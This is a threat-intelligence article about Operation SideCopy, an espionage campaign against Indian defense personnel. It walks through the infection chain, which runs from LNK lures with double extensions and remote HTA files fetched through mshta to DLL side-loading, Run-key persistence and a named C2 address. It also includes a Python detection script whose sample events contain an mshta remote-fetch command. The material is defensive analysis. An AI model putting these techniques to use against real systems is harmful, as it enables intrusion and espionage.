Recent cybersecurity investigations have revealed an ongoing cyberespionage initiative targeting Indian defense agencies and military personnel, dating back to at least 2019. This operation, identified as “Operation SideCopy” by Quick Heal, an Indian cybersecurity firm, is believed to be orchestrated by an advanced persistent threat (APT) group adept in concealing its activities by mimicking the strategies used by other threat actors, such as SideWinder.

The modus operandi begins with a phishing email containing a malicious attachment, either a ZIP file housing an LNK file or a specially crafted Microsoft Word document. This initial step triggers a sequence of infections, ultimately leading to the deployment of a final-stage payload.

Notably, one infection pathway exploited a long-standing vulnerability in the Microsoft Equation Editor, known as CVE-2017-11882. This flaw, a 20-year-old memory corruption issue within Microsoft Office products, permits remote code execution on compromised systems without user interaction. Microsoft has provided a patch for this vulnerability since November 2017.

The campaign effectively employs social engineering tactics, enticing recipients into opening a seemingly legitimate Word document purporting to discuss India’s defense production policy. The deceptive attachments display double extensions (e.g., “Defence-Production-Policy-2020.docx.lnk”) and feature document icons designed to mislead users into executing the files.

Once activated, these LNK files exploit mshta.exe to execute malicious HTA files hosted on fake websites, created using an open-source payload generation tool named CACTUSTORCH. The first-stage HTA file includes both a decoy document and a malicious .NET module, which leads to the download of a secondary HTA file. This file checks for well-known antivirus programs and then relocates Microsoft’s credential backup and restore utility (“credwiz.exe”) to another directory on the victim’s system, setting it to execute upon startup by modifying the system registry.

Upon execution, the compromised file side-loads a malicious “DUser.dll” and launches a RAT module named “winms.exe,” both sourced from the second-stage HTA. This DUser.dll establishes a connection to a remote server via the IP address ‘173.212.224.110’ over TCP port 6102. Following a successful connection, the malware conducts various operations based on commands from its command and control (C2) server, such as gathering and relaying system information back to the attacker.
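The infection chain described in the preceding paragraphs (a double-extension LNK lure, mshta.exe fetching a remote HTA, credwiz.exe relocated out of its system directory, DUser.dll side-loaded from that same directory, a Run-key entry for persistence, and a beacon to 173.212.224.110 on TCP 6102) can be turned into host-based detection logic. The following is an added example written for this page; it is not code from the article, from Quick Heal, or from the campaign. The indicators come from the text above, while the Sysmon-like event schema, the field names, the legitimate credwiz.exe locations, and every sample event are assumptions constructed for illustration.

```python
"""Added example (not from the original article): a small rule set that checks
Sysmon-style endpoint events for the Operation SideCopy chain behaviours.

Indicators (credwiz.exe, DUser.dll, mshta.exe + remote .hta, double-extension
.lnk names, 173.212.224.110:6102) are taken from the article. The event
schema, field names and all sample records below are constructed assumptions.
"""
import ntpath  # Windows path handling regardless of the analyst's host OS
import re

# C2 endpoint named in the article.
SIDECOPY_C2 = ("173.212.224.110", 6102)
# Assumed legitimate homes of credwiz.exe and DUser.dll on a Windows host;
# the campaign's trick is to run/load them from anywhere else.
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# Lure file names such as "Defence-Production-Policy-2020.docx.lnk".
DOUBLE_EXT_LNK = re.compile(r"\.(docx?|xlsx?|pptx?|pdf)\.lnk$", re.IGNORECASE)
# mshta.exe handed an http(s) URL ending in .hta.
REMOTE_HTA = re.compile(r"https?://\S+\.hta\b", re.IGNORECASE)


def _name(path: str) -> str:
    return ntpath.basename(path).lower()


def _dir(path: str) -> str:
    return ntpath.dirname(path).lower()


def detect(event: dict) -> list[str]:
    """Return the names of every SideCopy-chain rule matched by one event."""
    hits = []
    kind = event.get("type")
    if kind == "file_create" and DOUBLE_EXT_LNK.search(event.get("path", "")):
        hits.append("double_extension_lnk_lure")
    elif kind == "process":
        image = event.get("image", "")
        if _name(image) == "mshta.exe" and REMOTE_HTA.search(event.get("cmdline", "")):
            hits.append("mshta_remote_hta")
        if _name(image) == "credwiz.exe" and _dir(image) not in SYSTEM_DIRS:
            hits.append("credwiz_relocated")
    elif kind == "image_load":
        loaded = event.get("loaded", "")
        if (_name(event.get("image", "")) == "credwiz.exe"
                and _name(loaded) == "duser.dll"
                and _dir(loaded) not in SYSTEM_DIRS):
            hits.append("duser_dll_sideload")
    elif kind == "registry":
        key = event.get("key", "").lower()
        value = event.get("value", "")
        if (r"\currentversion\run" in key
                and _name(value) == "credwiz.exe"
                and _dir(value) not in SYSTEM_DIRS):
            hits.append("run_key_persistence")
    elif kind == "network":
        if (event.get("dst_ip"), event.get("dst_port")) == SIDECOPY_C2:
            hits.append("sidecopy_c2_beacon")
    return hits


def scan(events: list[dict]) -> dict[int, list[str]]:
    """Map event id -> matched rules, for every event that matched at least one."""
    results = {}
    for event in events:
        hits = detect(event)
        if hits:
            results[event["id"]] = hits
    return results


# Constructed sample telemetry: six events that replay the chain, three benign.
SAMPLE_EVENTS = [
    {"id": 1, "type": "file_create",
     "path": r"C:\Users\analyst\Downloads\Defence-Production-Policy-2020.docx.lnk"},
    {"id": 2, "type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/stage1.hta"},  # placeholder host
    {"id": 3, "type": "process", "image": r"C:\Users\analyst\AppData\Roaming\credwiz.exe",
     "cmdline": "credwiz.exe"},
    {"id": 4, "type": "image_load", "image": r"C:\Users\analyst\AppData\Roaming\credwiz.exe",
     "loaded": r"C:\Users\analyst\AppData\Roaming\DUser.dll"},
    {"id": 5, "type": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": r"C:\Users\analyst\AppData\Roaming\credwiz.exe"},
    {"id": 6, "type": "network", "image": r"C:\Users\analyst\AppData\Roaming\credwiz.exe",
     "dst_ip": "173.212.224.110", "dst_port": 6102},
    # Benign: the real utility and DLL in their system directory, ordinary HTTPS.
    {"id": 7, "type": "process", "image": r"C:\Windows\System32\credwiz.exe",
     "cmdline": "credwiz.exe"},
    {"id": 8, "type": "image_load", "image": r"C:\Windows\System32\credwiz.exe",
     "loaded": r"C:\Windows\System32\DUser.dll"},
    {"id": 9, "type": "network", "image": r"C:\Program Files\Browser\browser.exe",
     "dst_ip": "93.184.216.34", "dst_port": 443},
]

if __name__ == "__main__":
    for event_id, rules in scan(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(rules)}")
```

The IP/port rule is the weakest of the six, since infrastructure changes between campaigns; the behavioural rules (a signed Microsoft binary running from a user-writable directory, a system DLL name loaded from outside the system directories, and mshta.exe reaching out for a remote HTA) survive a change of server and are the ones worth keeping in a production rule set.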

The RAT shows coding similarities to Allakore Remote, an open-source remote access tool written in Delphi, utilizing the RFB (remote frame buffer) protocol for data exfiltration from the infected system. Moreover, some attack chains have introduced a novel .NET-based RAT nicknamed “Crimson RAT” by Kaspersky. This RAT boasts extensive capabilities, such as accessing files and clipboard data, terminating processes, and executing arbitrary commands.

While the naming conventions of DLL files are reminiscent of the SideWinder group, the primary reliance on open-source tools and distinct command infrastructure leads researchers to suggest a probable connection to the Transparent Tribe APT group. This group, believed to have connections to Pakistan, has recently targeted Indian military and government entities. Quick Heal’s analysis indicates that the actor behind this operation may be a faction of the Transparent Tribe, employing tactics borrowed from other threat groups to obscure their true identity.
